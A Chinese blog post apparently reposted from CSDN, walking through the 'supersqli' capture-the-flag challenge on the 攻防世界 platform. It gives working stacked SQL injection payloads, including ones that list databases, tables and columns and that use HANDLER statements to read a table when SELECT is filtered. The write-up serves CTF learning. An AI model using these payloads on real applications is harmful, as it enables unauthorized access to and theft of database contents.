首页 > 数据库 >攻防世界supersqli

攻防世界supersqli

时间:2024-07-17 23:30:08浏览次数:18  
标签:语句 攻防 use show 或表 世界 supersqli 注入

supersqli

SQL注入的常规思路是判断注入点,尝试后发现注入点为’

判断字符数量

得出数量为2

然后尝试联合注入

发现select等字符被过滤,尝试堆叠注入

-1';show databases;#

猜测在supersqli的可能性会大一点(也可以挨个尝试)

-1';use supersqli;show tables;# 

查询具体表

-1';use supersqli;show columns from `1919810931114514`;# 

查询flag

-1';use supersqli;handler `1919810931114514` open as p;handler p read first;#

ps:

HANDLER 语句用于操作存储在服务器上的文件或表。正确使用 HANDLER 语句需要遵循特定的语法和步骤。需要先使用 open 再使用 read

文件或表的打开:

在读取文件或表之前,必须先打开它。HANDLER 语句的 OPEN 子句用于打开文件或表,并将其与一个别名关联。这样可以在后续的 READ 操作中引用该名。

use supersqli并没有起到作用,use 语句不是用来执行 SQL 注入的。所以可加可不加,但方便理解。

标签:语句,攻防,use,show,或表,世界,supersqli,注入
From: https://blog.csdn.net/2301_79858466/article/details/140508201

相关文章

  • 编程世界的对决:JavaScript vs Java
    在编程领域,Java和JavaScript这两门语言各有千秋。它们不仅在语法上有着明显的区别,在编程理念、表现力、类型转换以及代码的易读性和复杂性方面也有着巨大的差异。本文将深入探讨JavaScript相较于Java的优势,以及两者在代码风格和开发体验上的不同。1.表现力的对比1.1JavaScr......
  • C语言函数:编程世界的魔法钥匙(1)
    目录1.C语言中的函数是什么?2.函数的分类:2.1标准库函数2.1.1库函数的诞生:2.1.2库函数的作用:2.1.3如何学习使用库函数2.2自定义函数2.2.1函数的组成:2.2.2自定义函数的优点  2.2.3 例题3.函数的参数3.1实际参数(实参):3.2形式参数(形参):4.函数的调用4.1......
  • Datawhale AI 夏令营 全球Deepfake攻防挑战赛
                    近日有学习多模态技术的需求,碰巧撞上Datawhale的夏令营,初看要求颇高,既要打卡还要分享,心中顿起燥心,转念一想,其实不失为一次磨练机会,为提高自己逃课摆烂的成本,邃开始撰写自己第一篇公开的学习笔记,若多日后看见虎头蛇尾的学习笔记,想必羞愧难当。......
  • Datawhale AI 夏令营 全球Deepfake攻防挑战赛 task2
    数天未见,进步如何?距第一篇笔记发布已过多日,在笔记中立下的flag推动下再次打开CSDN创作中心来记录学习进展。首先让我来对竞赛项目和datawhale提供的baseline做一个简单的梳理:balseline网址:https://www.kaggle.com/code/littlejian/deepfake-ffdv-baseline项目要求:判断一......
  • 【攻防技术系列+权限维持】Linux隐藏技术
    #权限维持#Linux#隐藏一、隐藏文件二、隐藏文件时间戳三、隐藏权限四、隐藏历史操作五、隐藏端口六、隐藏进程一、隐藏文件创建一个隐藏文件:touch.test.txt一般的Linux下的隐藏目录使用命令ls-l是查看不出来的,只能查看到文件及文件夹,查看Linux下的隐藏......
  • unity局部坐标和世界坐标角度介绍
    在Unity中,局部坐标(LocalCoordinates)和世界坐标(WorldCoordinates)是描述物体位置的两种不同方式:局部坐标(LocalCoordinates):局部坐标是相对于物体自身的坐标系来描述物体上的点的位置。对于一个物体而言,它的局部坐标原点通常位于物体的中心,坐标轴则沿着物体的局部方向。例如,......
  • 视创云展数字人驱动引擎,“解锁”你在虚拟世界的“数字化身”!
    数字人驱动引擎作为视创云展的核心功能之一,提供了强大的数字人创作与交互能力,以其DIY自由创作、多模态驱动、支持写实/卡通形象以及打造元宇宙身份代理等核心优势,为用户在元宇宙中创造个性化、智能化的数字人体验提供了强有力的支持。一、DIY自由创作视创云展的数字人驱动引......
  • 无人驾驶的未来:AI如何重塑我们的出行世界
      无人驾驶汽车,作为人工智能(AI)技术的集大成者,正以前所未有的速度改变着我们的出行方式。从机器学习到计算机视觉,再到人工智能生成内容(AIGC),AI技术的每一次进步都在为无人驾驶汽车的未来发展铺平道路。本文将深入探讨AI如何赋能无人驾驶,以及特斯拉与百度“萝卜快跑”如何在......
  • 【攻防技术系列】MSF进程迁移
    #Msfvenom#进程迁移#pid虚拟机环境搭建【Kali】,192.168.10.131【win7】,192.168.10.134一、MSF进程迁移1.1手动迁移migratepid或者migrate-N应用名字[推荐:explorer.exe]1.2自动迁移setautorunscriptmigrate-nexplorer.exe或者使用默认迁移的setautor......
  • 核客任务实战-WEB服务器攻防篇教程
    前言网站服务器的核客攻防一直是网络安全中最重要的一部分,本书作者在经过数月的努力之后,终于将网站服务器的攻防以深入浅出、简单易懂的方式呈现在您的眼前,让您不必具有高深的网络知识和经验,只要依照本书的操作说明来按图索骥的进行,就能让您充分了解与感受到高手的技巧和行为一......